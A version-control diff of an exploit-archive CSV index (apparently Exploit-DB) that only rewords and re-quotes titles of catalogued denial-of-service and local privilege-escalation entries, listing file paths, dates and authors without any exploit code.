15467,exploits/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",dos,multiple,
|
||||
15474,exploits/multiple/dos/15474.txt,"IBM OmniFind - Buffer Overflow",2010-11-09,"Fatih Kilic",dos,multiple,
|
||||
15476,exploits/multiple/dos/15476.php,"IBM OmniFind Crawler - Denial of Service",2010-11-09,"Fatih Kilic",dos,multiple,
|
||||
|
@ -1843,7 +1843,7 @@ id,file,description,date,author,type,platform,port
|
|||
15803,exploits/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",dos,windows,
|
||||
15738,exploits/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows,
|
||||
15739,exploits/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows,
|
||||
15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities",2010-12-16,modpr0be,dos,windows,
|
||||
15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Denial of Service Vulnerabilities",2010-12-16,modpr0be,dos,windows,
|
||||
15758,exploits/windows_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",dos,windows_x86,
|
||||
15767,exploits/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",dos,windows,
|
||||
15786,exploits/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,dos,windows,
|
||||
|
@ -2005,12 +2005,12 @@ id,file,description,date,author,type,platform,port
|
|||
17610,exploits/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",dos,multiple,
|
||||
17618,exploits/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service",2011-08-05,"SecPod Research",dos,windows,
|
||||
17620,exploits/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",dos,windows,
|
||||
17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",dos,windows,
|
||||
17638,exploits/windows/dos/17638.py,"LiteServe 2.81 - 'PASV' Denial of Service",2011-08-08,"Craig Freyman",dos,windows,
|
||||
17642,exploits/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,dos,windows,
|
||||
17643,exploits/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,dos,windows,
|
||||
17658,exploits/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive",2011-08-12,G13,dos,windows,
|
||||
17664,exploits/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,dos,windows,
|
||||
17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,dos,windows,
|
||||
17676,exploits/windows/dos/17676.py,"Notepad++ NppFTP Plugin - 'LIST' Remote Heap Overflow (PoC)",2011-08-17,0in,dos,windows,
|
||||
17696,exploits/multiple/dos/17696.pl,"Apache - Remote Memory Exhaustion (Denial of Service)",2011-08-19,kingcope,dos,multiple,
|
||||
17712,exploits/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",dos,windows,
|
||||
17718,exploits/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",dos,windows,
|
||||
|
@ -2137,7 +2137,7 @@ id,file,description,date,author,type,platform,port
|
|||
18460,exploits/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",dos,php,
|
||||
18461,exploits/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow (Denial of Service) (PoC)",2012-02-04,"Senator of Pirates",dos,windows,
|
||||
18463,exploits/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",dos,windows,
|
||||
18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",dos,windows,
|
||||
18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",dos,windows,
|
||||
18475,exploits/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death",2012-02-09,shinnai,dos,windows,
|
||||
18481,exploits/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",dos,windows,
|
||||
18488,exploits/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",dos,windows,8300
|
||||
|
@ -2429,9 +2429,9 @@ id,file,description,date,author,type,platform,port
|
|||
20094,exploits/windows/dos/20094.txt,"NullSoft Winamp 2.64 - '.m3u' Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",dos,windows,
|
||||
20098,exploits/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",dos,multiple,
|
||||
20099,exploits/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,dos,windows,
|
||||
20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",dos,windows,
|
||||
20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service",2000-07-21,"Blue Panda",dos,windows,
|
||||
20101,exploits/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",dos,windows,
|
||||
20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows,
|
||||
20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - 'MLST' Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows,
|
||||
43147,exploits/hardware/dos/43147.sh,"D-Link DIR-605L < 2.08 - Denial of Service",2017-11-14,"Enrique Castillo",dos,hardware,
|
||||
20167,exploits/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,dos,linux,
|
||||
20175,exploits/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",dos,windows,
|
||||
|
@ -2606,7 +2606,7 @@ id,file,description,date,author,type,platform,port
|
|||
21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple,
|
||||
21224,exploits/linux_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,linux_x86-64,
|
||||
21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows,
|
||||
21232,exploits/multiple/dos/21232.c,"Oracle 8i - dbsnmp Command Remote Denial of Service",2002-01-17,benjurry,dos,multiple,
|
||||
21232,exploits/multiple/dos/21232.c,"Oracle 8i - 'dbsnmp' Remote Denial of Service",2002-01-17,benjurry,dos,multiple,
|
||||
21234,exploits/osx/dos/21234.sh,"Netopia Timbuktu Pro for Macintosh 6.0.1 - Denial of Service",2002-01-18,"Tekno pHReak",dos,osx,
|
||||
21236,exploits/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",dos,unix,
|
||||
21237,exploits/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",dos,windows,
|
||||
|
@ -2755,7 +2755,7 @@ id,file,description,date,author,type,platform,port
|
|||
22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix,
|
||||
22074,exploits/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,dos,osx,
|
||||
22079,exploits/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",dos,linux,
|
||||
22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",dos,windows,
|
||||
22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - 'FTP' Buffer Overflow",2002-12-09,"Tamer Sahin",dos,windows,
|
||||
22100,exploits/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",dos,windows,
|
||||
22105,exploits/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",dos,linux,
|
||||
22110,exploits/php/dos/22110.txt,"PHP-Nuke 6.0 - 'modules.php' Denial of Service",2002-12-23,"Ing. Bernardo Lopez",dos,php,
|
||||
|
@ -2902,7 +2902,7 @@ id,file,description,date,author,type,platform,port
|
|||
22780,exploits/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",dos,windows,
|
||||
22788,exploits/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,dos,windows,
|
||||
22789,exploits/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,dos,windows,
|
||||
22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,dos,windows,
|
||||
22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - 'CWD' Denial of Service",2003-05-12,dr_insane,dos,windows,
|
||||
22794,exploits/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of Service",2003-06-17,dr_insane,dos,windows,
|
||||
22796,exploits/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",dos,linux,
|
||||
22797,exploits/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",dos,hardware,
|
||||
|
@ -3048,7 +3048,7 @@ id,file,description,date,author,type,platform,port
|
|||
23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,dos,osx,
|
||||
23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,dos,multiple,
|
||||
23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",dos,php,
|
||||
23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,dos,windows,
|
||||
23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows,
|
||||
23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,dos,windows,
|
||||
23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)",2003-12-26,"decka trash",dos,windows,
|
||||
23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",dos,windows,
|
||||
|
@ -3104,13 +3104,13 @@ id,file,description,date,author,type,platform,port
|
|||
23715,exploits/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,dos,windows,
|
||||
23716,exploits/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",dos,windows,
|
||||
23731,exploits/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",dos,windows,
|
||||
23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",dos,php,
|
||||
23750,exploits/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Denial of Service",2004-02-24,"Zone-h Security Team",dos,php,
|
||||
23752,exploits/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,windows,
|
||||
23755,exploits/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,multiple,
|
||||
23757,exploits/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",dos,linux,
|
||||
23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,dos,windows,
|
||||
23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,dos,windows,
|
||||
23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,dos,windows,
|
||||
23760,exploits/windows/dos/23760.pl,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (1)",2004-02-26,saintjmf,dos,windows,
|
||||
23761,exploits/windows/dos/23761.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,dos,windows,
|
||||
23762,exploits/windows/dos/23762.c,"RhinoSoft Serv-U FTPd Server 3/4/5 - 'MDTM' Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,dos,windows,
|
||||
23769,exploits/windows/dos/23769.pl,"ArGoSoft FTP Server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",dos,windows,
|
||||
23778,exploits/hardware/dos/23778.c,"Motorola T720 Phone - Denial of Service",2004-03-01,"Shaun Colley",dos,hardware,
|
||||
23779,exploits/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash (PoC)",2012-12-31,"Joshua Rogers",dos,linux,
|
||||
|
@ -3295,7 +3295,7 @@ id,file,description,date,author,type,platform,port
|
|||
24809,exploits/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,dos,multiple,
|
||||
24815,exploits/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",dos,linux,
|
||||
24818,exploits/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle - Remote Denial of Service",2004-12-13,"Luigi Auriemma",dos,multiple,
|
||||
24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",dos,linux,
|
||||
24828,exploits/linux/dos/24828.txt,"Opera Web Browser 7.54 - 'KDE KFMCLIENT' Remote Command Execution",2004-12-13,"Giovanni Delvecchio",dos,linux,
|
||||
24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware,
|
||||
24841,exploits/windows/dos/24841.txt,"Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String",2004-12-14,"Greg MacManus",dos,windows,
|
||||
24843,exploits/osx/dos/24843.txt,"Apple Safari Web Browser 1.x - HTML Form Status Bar Misrepresentation",2004-12-15,Guillaume,dos,osx,
|
||||
|
@ -3585,7 +3585,7 @@ id,file,description,date,author,type,platform,port
|
|||
28087,exploits/windows/dos/28087.txt,"Microsoft Office 2003 - Embedded Shockwave Flash Object Security Bypass",2006-06-22,"Debasis Mohanty",dos,windows,
|
||||
28099,exploits/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",dos,windows,
|
||||
28100,exploits/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",dos,cfm,
|
||||
28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,dos,windows,
|
||||
28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP 'HELO' Remote Denial of Service",2006-06-24,db0,dos,windows,
|
||||
28135,exploits/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",dos,osx,
|
||||
28144,exploits/windows/dos/28144.txt,"Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,dos,windows,
|
||||
28145,exploits/windows/dos/28145.html,"Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,dos,windows,
|
||||
|
@ -3703,7 +3703,7 @@ id,file,description,date,author,type,platform,port
|
|||
29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",dos,windows,
|
||||
29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,dos,windows,
|
||||
29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",dos,linux,
|
||||
29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
|
||||
29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware,
|
||||
29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
|
||||
29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",dos,windows,
|
||||
29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple,
|
||||
|
@ -3778,7 +3778,7 @@ id,file,description,date,author,type,platform,port
|
|||
29743,exploits/windows/dos/29743.txt,"Symantec 'SYMTDI.SYS' Device Driver - Local Denial of Service",2007-03-15,"David Matousek",dos,windows,
|
||||
29767,exploits/hardware/dos/29767.txt,"ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service",2007-03-20,"Joxean Koret",dos,hardware,
|
||||
29781,exploits/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",dos,linux,
|
||||
29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - RERT Command Denial of Service",2007-01-18,Handrix,dos,windows,
|
||||
29787,exploits/windows/dos/29787.py,"HP JetDirect FTP Print Server - 'RERT' Denial of Service",2007-01-18,Handrix,dos,windows,
|
||||
30110,exploits/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow (Denial of Service) (PoC)",2007-05-31,"Tavis Ormandy",dos,linux,
|
||||
30139,exploits/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 - Outpost_IPC_HDR Local Denial of Service",2007-06-04,"Matousec Transparent security",dos,multiple,
|
||||
30160,exploits/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service",2007-06-06,"Dennis Rand",dos,windows,
|
||||
|
@ -3870,7 +3870,7 @@ id,file,description,date,author,type,platform,port
|
|||
30592,exploits/multiple/dos/30592.py,"Python 2.2 ImageOP Module - Multiple Integer Overflow Vulnerabilities",2007-09-17,"Slythers Bro",dos,multiple,
|
||||
30593,exploits/windows/dos/30593.txt,"Microsoft MFC Library - CFileFind::FindFile Buffer Overflow",2007-09-14,"Jonathan Sarba",dos,windows,
|
||||
30619,exploits/windows/dos/30619.txt,"Microsoft Windows Explorer - '.png' Image Local Denial of Service",2007-07-26,"Xavier Roche",dos,windows,
|
||||
30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - servinterface.cc servinterface::sendmulticast Function PIcallsign Command Remote Overflow",2007-10-01,"Luigi Auriemma",dos,windows,
|
||||
30628,exploits/windows/dos/30628.txt,"FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow",2007-10-01,"Luigi Auriemma",dos,windows,
|
||||
30644,exploits/multiple/dos/30644.txt,"Dawn of Time 1.69 MUD Server - Multiple Format String Vulnerabilities",2007-10-05,"Luigi Auriemma",dos,multiple,
|
||||
30646,exploits/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow",2007-07-16,"Nobuhiro Ban",dos,linux,
|
||||
30648,exploits/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow",2007-10-08,Erik,dos,linux,
|
||||
|
@ -3949,7 +3949,7 @@ id,file,description,date,author,type,platform,port
|
|||
31271,exploits/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",dos,multiple,
|
||||
31203,exploits/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",dos,multiple,
|
||||
31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,dos,windows,
|
||||
31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux,
|
||||
31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service",2008-02-17,"Luigi Auriemma",dos,linux,
|
||||
31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,dos,linux,
|
||||
31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC)",2014-01-27,Citadelo,dos,windows,
|
||||
31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,dos,multiple,
|
||||
|
@ -4062,7 +4062,7 @@ id,file,description,date,author,type,platform,port
|
|||
32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple,
|
||||
32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple,
|
||||
32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple,
|
||||
32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
|
||||
32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple,
|
||||
32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple,
|
||||
32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",dos,multiple,
|
||||
32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows,
|
||||
|
@ -4348,7 +4348,7 @@ id,file,description,date,author,type,platform,port
|
|||
34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",dos,linux,
|
||||
34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)",2010-08-03,"Rodrigo Escobar",dos,hardware,
|
||||
34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",dos,windows,
|
||||
34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
|
||||
34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows,
|
||||
34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,dos,windows,
|
||||
34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",dos,linux,
|
||||
34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",dos,windows,
|
||||
|
@ -4632,8 +4632,8 @@ id,file,description,date,author,type,platform,port
|
|||
37763,exploits/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service",2015-08-12,Un_N0n,dos,windows,
|
||||
37764,exploits/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",dos,windows,
|
||||
37766,exploits/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",dos,multiple,
|
||||
37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service",2015-08-15,St0rn,dos,windows,
|
||||
37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,dos,windows,
|
||||
37775,exploits/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' 'USER' Remote Denial of Service",2015-08-15,St0rn,dos,windows,
|
||||
37776,exploits/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel 'AUTHCODE' Remote Denial of Service",2015-08-15,St0rn,dos,windows,
|
||||
37777,exploits/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",dos,linux,
|
||||
37783,exploits/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",dos,linux,
|
||||
38001,exploits/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,dos,windows,22
|
||||
|
@ -6094,7 +6094,7 @@ id,file,description,date,author,type,platform,port
|
|||
288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,
|
||||
290,exploits/linux/local/290.tcsh,"GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation",2001-03-04,Shadow,local,linux,
|
||||
302,exploits/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,local,unix,
|
||||
317,exploits/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution",1996-01-01,"Jared Mauch",local,linux,
|
||||
317,exploits/linux/local/317.txt,"Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution",1996-01-01,"Jared Mauch",local,linux,
|
||||
319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux,
|
||||
320,exploits/linux/local/320.pl,"suid_perl 5.001 - Command Execution",1996-06-01,"Jon Lewis",local,linux,
|
||||
321,exploits/multiple/local/321.c,"BSD / Linux - 'umount' Local Privilege Escalation",1996-08-13,bloodmask,local,multiple,
|
||||
|
@ -8391,7 +8391,7 @@ id,file,description,date,author,type,platform,port
|
|||
22615,exploits/freebsd/local/22615.c,"Maelstrom Server 3.0.x - Argument Buffer Overflow (3)",2003-05-20,CMN,local,freebsd,
|
||||
22616,exploits/linux/local/22616.pl,"Maelstrom Player 3.0.x - Argument Buffer Overflow (1)",2003-05-21,"Luca Ercoli",local,linux,
|
||||
